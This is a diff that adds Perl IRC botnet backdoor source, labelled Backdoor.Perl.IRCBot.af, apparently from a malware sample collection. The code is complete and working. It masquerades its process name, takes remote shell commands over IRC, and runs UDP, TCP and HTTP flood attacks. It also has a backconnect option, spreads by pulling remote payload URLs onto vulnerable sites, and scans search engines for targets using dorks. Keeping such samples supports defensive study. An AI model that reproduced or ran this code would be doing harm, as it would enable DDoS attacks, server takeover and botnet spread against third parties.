$itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@HTTP-DDOS12] Attacking done 4 ".$1."."); +} +###################### +# End of HTTPFlood # +###################### + +###################### +# UDPFlood # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@UDP-DDOS12] 12Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +##### +# SUBS GOOGLE +##### +sub googlet { +my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk"); +my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK"); +my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $i (@dominios){ +my @lista = google($i,$key,$lang[$c],$country[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + +sub google(){ +my @lst; +my $i=$_[0]; +my $key=$_[1]; +my $lang= $_[2]; +my $country =$_[3]; +for($b=0;$b<=5000;$b+=100){ +my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS AllTheWeb +##### + +sub allthewebt { +my @lang = ("en","es","de","nl","pt-BR","it","de","fo"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $lang (@lang){ +my @lista = alltheweb($key,$lang[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + + +sub alltheweb(){ +my @lista; +my $key = $_[0]; +my $lang= $_[1]; +for($b=0;$b<=500;$b+=100){ +my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b); +my $Res=query($alltheweb); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub standard() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS AOL +##### +sub aol(){ +my @lst; +my $key = $_[0]; + my $start; + my $num=20; + my $max=100*5; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://search.aol.com/aol/search?query=".$dork."&safesearch=0&count_override=".$num."&page=".$start/$num); + } + while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +} +return @lst; +} + + +##### +# SUBS Yahoo +##### +sub yahoo(){ +my @lst; +my $key = $_[0]; + my $start; + my $num=100; + my $max=100*10; + for($start=0;$start < $max; $start += $num){ + my $Yahoo=("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".key($key)."&results=".$num."&start=".$start); +my $Res=query($Yahoo); +while($Res =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS MSN +##### +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS ASK +##### +sub ask(){ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=10) +{ +my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); +my $Res=query($Ask); +while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ +my $k=$3; +$k=~s/[\"\ ]//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS UOL +##### +sub uol(){ +my @lst; +my $key=$_[0]; +my $inizio=1; +my $pagine=25; +my $av=1; + +while($inizio <= $pagine){ +my $uol="http://busca.uol.com.br/www/index.html?q=".key($key)."&start=$av"; +my $Res=query($uol); +while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){ +my $ok="$1/"; +my @grep=links($ok); +push(@lst,@grep); +} +$av=$av+10; +$inizio++; +} +return @lst; +} + + +##### +# SUBS FireBall +##### +sub fireball(){ +my $key=$_[0]; +my $inizio=1; +my $pagine=200; +my @lst; +my $av=0; +while($inizio <= $pagine){ +my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8"; +my $Res=query($fireball); +while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +$av=$av+10; +$inizio++; +} +return @lst; +} + +##### +# SUBS GIGABLAST +##### +sub gigablast(){ +my $key=$_[0]; +my @lst; +my $start; +my $max=1000; +my $num =10; +my @result; + +for($start=0;$start < $max; $start += $num){ +my $giga=("http://www.gigablast.com/search?s=".$num."&q=".$dork); +my $Res=query($giga); +while($res =~ m/<span class=\"url\">(.+?)\<\/span>/g){ +my $k="$1/"; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} + +} + diff --git a/Perl/Backdoor.Perl.IRCBot.af b/Perl/Backdoor.Perl.IRCBot.af new file mode 100644 index 00000000..87c0e27d --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.af @@ -0,0 +1,2578 @@ +# +######################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata +# Anak +# _____ +# ( ___ ) _____ __ ___ ____ _ _ +# | | \ \( _ )( \/ )( _ )( ) ( ) +# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu +# ////| | | ) | | || |\/ | || ___)| | | | / crew +# | |__/ /| (_) || | | || | | |_| | +# (_____) (_____)(_) (_)(_) (_____) +# +# AnakDompu [on] Dalnet й 2008 +# +# +######################################################## + + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); +my $processo = $ps[rand scalar @ps]; +my $linas_max='10'; +my $sleep='3'; +my $cmd="http://www.geocities.com/ghanjar.satriani/kontol.txt???"; +my $id="http://www.hanbol.es.kr/id.txt"; +my $spread="http://www.hanbol.es.kr/alls.txt???"; +my $perawan="http://www.hanbol.es.kr/alls.txt???"; +my $idku="http://www.hanbol.es.kr/pbots.txt???"; +my @adms=("klepek_klepek","wisnoee"); +my @canais=("#ponticity"); +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +my @nickname = ("AkeZuKa", + "AbankSayang", + "Sampula", + "FuRkaN", + "AnakDompu", + "SaMaDa", + "SaMPeLa", + "ShuZuKa", + "TalamPa", + "Tambora", + "Henca", + "Hencarasa", + "HencaSpy", + "SamPuLa"); +my @rname = ("Ketika Rasa Tak Dapat Di UngkaP", + "PowereD By AnakDompu", + "SeRinG PuTus Cinta", + "Aku Mudah Jatuh Cinta", + "ModeL Bug1L AnakDompu", + "Jpop And JrocK Lyric", + "Ketika Rasa Tak Dapat Diungkap Bro", + "Percuma Kita Bersama DinDa", + "klepek_klepek Memang cakep", + "Suka Nonton Movie hentai la", + "Lihat Cewek2 Pake tanktop", + "Owned By AnakDompu"); +my $nick = $nickname[rand scalar @nickname]; +my $ircname = $nickname[rand scalar @nickname]; +my $realname = $rname[rand scalar @rname]; +$servidor='irc.ardantus.org' unless $servidor; +my $porta='6667'; + +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +# PREFIX # +###################### + + if ($args =~ /^(\Q$meunick\E|\!xan)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!xan" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Select the function you want help for"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4ddos"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4backconnect"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscanner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Or if you want too know all the commands type:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4commands"); + +} + +if ($funcarg =~ /^ddos/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There are 3 DDossers in this bot"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 UDPFlood, HTTPFlood and TCPFlood"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4httpflood <site> <time>"); + +} + +if ($funcarg =~ /^scanscan/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot also contains a scan Scanner."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 Commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can find strings here : http://www.xshqiptaretx.org/strings.txt "); + +} + +if ($funcarg =~ /^backconnect/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You use backconnect like this :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4back <ip><port>"); +} + +if ($funcarg =~ /^shell/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 This bot has a integrated shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use it in private but also public in the channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 In public channel just use : 7!xan cd tmp12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 For help with the linux commands type :!xan 13@4linuxhelp"); +} + +if ($funcarg =~ /^portscanner/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 There is a normal portscan and a Nmap:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4nmap <ip> <beginport> <endport>"); +} + +if ($funcarg =~ /^commands/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 You can use the following commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4nmap <ip> <beginport> <endport>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4back <ip><port>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan cd tmp 12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4httpflood <site> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4linuxhelp"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4spread <scan>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4system"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4logcleaner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4sendmail <subject> <sender> <recipient> <message>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4milw0rm"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4join #channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BaNtUaN]8,1 !xan 13@4part #channel"); +} + +if ($funcarg =~ /^linuxhelp/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Dir where you are : pwd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Start a Perl file : perl file.pl"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Go back from dir : cd .."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Force to Remove a file/dir : rm -rf file/dir;ls -la"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Show all files/dir with permissions : ls -lia"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find config.inc.php files : find / -type f -name config.inc.php"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all writable folders and files : find / -perm -2 -ls"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all .htpasswd files : find / -type f -name .htpasswd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BantuanLinuX]8,1 - Find all service.pwd files : find / -type f -name service.pwd"); +} + +###################### +# End of Help # +###################### +if ($funcarg =~ /^spread\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 13,6[1klepek_klepek]11,10[1Memang]13,6[1Cakep] :4 $vuln"); +my $shellurl="http://".$vuln.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$shellurl); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 11,10[1AnakDompu] :12 $vuln"); +} + +############################################ +# Moded By klepek_klepek AnakDompu @Dalnet # +############################################ + +if ($funcarg =~ /^LoadBotPhp\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Menjalankan BotPhp] 13,6[1klepek_klepek]11,10[1Memang]13,6[1Cakep] :4 $vuln"); +my $kalampabot="http://".$vuln.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$kalampabot); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Botphp] 11,10[1DiJalanKan] :12 $vuln"); +} +###################### +# Commands # +###################### + +if ($funcarg =~ /^system/) { +$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`; + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Info 